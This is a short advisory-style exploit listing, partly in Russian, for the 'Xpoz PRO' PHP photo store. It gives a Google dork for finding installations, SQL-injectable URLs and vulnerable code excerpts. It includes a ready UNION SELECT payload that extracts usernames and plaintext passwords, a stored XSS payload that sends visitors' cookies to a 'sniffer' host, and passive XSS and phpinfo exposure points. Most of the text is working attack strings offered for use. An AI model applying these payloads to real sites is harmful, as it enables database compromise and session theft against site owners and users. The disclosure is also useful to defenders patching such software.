Application: Xpoz PRO (Expoze Photo Store)
Website: http://xpoze.org
Version: All (current 1.0)
About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.
Googledork: Powered by Powered by Xpoze.org
Date: 01-07-2008
Description:
Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.
[ SQL-INJECTION ]
some…
http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
http://host/video.html?limiter=0&c=1[SQL]
And other vulnerable files:
—————————
// $p=[admin, editor, user, photo]
[ members/$p/edite.inc ]
if (isset($delete)) {
$ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error());
$row = mysql_fetch_assoc($ph);
$url = "../photos/".$row['photo'];
$thumb_url = "../thumbs/".$row['photo'];
mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());
$ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());
[ members/$p/editp.inc ]
$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());
[ include/img.rating.php ]
$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error());
$rates = mysql_num_rows($rat);
ETC…
===>>> Exploit:
http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20users%20limit%203,1/*
(!) Пароль в БД в открытом виде (!)
[ ACTIVE XSS ]
В форуме отсутствует фильтрация полей темы и сообщения.
===>>> Exploit:
<script>img = new Image(); img.src = «http://sniffer/sniff.jpg?»+document.cookie;</script>
[ PASSIVE XSS 
]
http://host/?tpl=[XSS]
PHPInfo – http://host/info.php
